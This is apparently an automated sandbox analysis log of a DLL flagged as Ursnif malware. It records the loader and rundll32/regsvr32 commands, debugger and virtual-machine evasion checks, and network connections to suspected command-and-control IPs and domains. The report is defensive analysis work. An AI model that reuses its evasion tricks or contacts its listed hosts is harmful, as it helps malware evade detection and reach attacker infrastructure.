            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_10001077 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,1_2_10001077
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_10002465 NtQueryVirtualMemory,1_2_10002465
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_010C77BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,1_2_010C77BB
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_010C8401 NtQueryVirtualMemory,1_2_010C8401
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04F977BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,5_2_04F977BB
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04F98401 NtQueryVirtualMemory,5_2_04F98401
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690AB8 NtProtectVirtualMemory,5_2_03690AB8
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690880 NtAllocateVirtualMemory,5_2_03690880
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042177BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,6_2_042177BB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04218401 NtQueryVirtualMemory,6_2_04218401
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_044477BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,9_2_044477BB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04448401 NtQueryVirtualMemory,9_2_04448401
            Source: Wartless_v8.8.9.0.dllBinary or memory string: OriginalFilenameWartless4 vs Wartless_v8.8.9.0.dll
            Source: Wartless_v8.8.9.0.dllBinary or memory string: OriginalFilenameRaCertMg.dll\ vs Wartless_v8.8.9.0.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: Wartless_v8.8.9.0.dllVirustotal: Detection: 19%
            Source: Wartless_v8.8.9.0.dllReversingLabs: Detection: 13%
            Source: Wartless_v8.8.9.0.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\Wartless_v8.8.9.0.dll
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Wartless_v8.8.9.0.dll,DllRegisterServer
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17414 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:82946 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17418 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:17416 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:82946 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:148484 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:17414 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:82946 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:214018 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:17416 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:148482 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:214018 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\Wartless_v8.8.9.0.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Wartless_v8.8.9.0.dll,DllRegisterServerJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17414 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:82946 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17418 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:17416 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:82946 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:148484 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:17414 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:82946 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:214018 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:17416 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:148482 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:214018 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF854BAA01E360BD39.TMPJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winDLL@45/99@38/10
            Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_010C2AB4 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_010C2AB4
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1
            Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: Wartless_v8.8.9.0.dllStatic PE information: More than 200 imports for gdi32.dll
            Source: Wartless_v8.8.9.0.dllStatic PE information: More than 200 imports for user32.dll
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_10002233 push ecx; ret 1_2_10002243
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_100021E0 push ecx; ret 1_2_100021E9
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_010C81CB push ecx; ret 1_2_010C81DB
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_010C7DE0 push ecx; ret 1_2_010C7DE9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04F97DE0 push ecx; ret 5_2_04F97DE9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04F981CB push ecx; ret 5_2_04F981DB
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690BFC push dword ptr [esp+0Ch]; ret 5_2_03690C10
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690BFC push dword ptr [esp+10h]; ret 5_2_03690C56
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_036905DF push dword ptr [ebp-00000284h]; ret 5_2_0369087F
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690A64 push edx; ret 5_2_03690B11
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690A64 push dword ptr [esp+10h]; ret 5_2_03690BFB
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_036906F5 push dword ptr [ebp-00000284h]; ret 5_2_03690764
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690AB8 push edx; ret 5_2_03690B11
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690880 push dword ptr [ebp-00000284h]; ret 5_2_036908B6
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04217DE0 push ecx; ret 6_2_04217DE9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_042181CB push ecx; ret 6_2_042181DB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_044481CB push ecx; ret 9_2_044481DB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04447DE0 push ecx; ret 9_2_04447DE9
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_10001BE8 LoadLibraryA,GetProcAddress,1_2_10001BE8
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\Wartless_v8.8.9.0.dll

            Hooking and other Techniques for Hiding and Protection

            barindex
            Yara detected Ursnif
            Source: Yara matchFile source: 00000005.00000003.349703615.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343910189.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349753525.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348956479.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.344026783.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343809632.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.503813220.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348909317.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.691343134.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350624974.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350468495.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.813030577.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349673542.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343983183.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343884833.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.811764188.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349765761.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343969010.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.811066205.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350524992.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349774706.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350610044.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349722283.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.505253975.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350578118.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348881206.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348997305.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350596775.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343764685.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350398147.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.343941350.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349738190.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.349603405.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.350426132.00000000037A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.349008394.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.502184053.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.811636892.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348935901.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348822890.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.348974214.0000000004A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7132, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 784, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2276, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6460, type: MEMORYSTR
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found evasive API chain (may stop execution after checking system information)
            Source: C:\Windows\System32\loaddll32.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7100Thread sleep time: -1773297476s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7100Thread sleep count: 76 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7100Thread sleep time: -38000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\loaddll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.810669617.00000000034E5000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW,
            Source: regsvr32.exe, 00000005.00000002.810669617.00000000034E5000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWyb
            Source: loaddll32.exe, 00000001.00000002.809655751.000000000112F000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW@

            Anti Debugging

            barindex
            Found API chain indicative of debugger detection
            Source: C:\Windows\System32\loaddll32.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_10001BE8 LoadLibraryA,GetProcAddress,1_2_10001BE8
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690B14 mov eax, dword ptr fs:[00000030h]5_2_03690B14
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690BFC mov eax, dword ptr fs:[00000030h]5_2_03690BFC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690A64 mov eax, dword ptr fs:[00000030h]5_2_03690A64
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690C57 mov eax, dword ptr fs:[00000030h]5_2_03690C57
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_03690CE8 mov eax, dword ptr fs:[00000030h]5_2_03690CE8

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 31.41.46.120 80Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: www.nnnnnn.casa
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 162.255.119.177 80Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: nnnnnn.casa
            Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: intermedia.bar
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 198.54.117.212 80Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: nnnnnn.bar
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.64.119.233 80Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 198.54.117.215 80Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 198.54.117.216 80Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll",#1Jump to behavior
            Source: loaddll32.exe, 00000001.00000002.810390997.0000000001730000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.811434769.0000000003A60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.810668747.0000000002BA0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.810609680.0000000002D00000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: loaddll32.exe, 00000001.00000002.810390997.0000000001730000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.811434769.0000000003A60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.810668747.0000000002BA0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.810609680.0000000002D00000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: loaddll32.exe, 00000001.00000002.810390997.0000000001730000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.811434769.0000000003A60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.810668747.0000000002BA0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.810609680.0000000002D00000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: loaddll32.exe, 00000001.00000002.810390997.0000000001730000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.811434769.0000000003A60000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.810668747.0000000002BA0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.810609680.0000000002D00000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_010C21BC cpuid 1_2_010C21BC
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
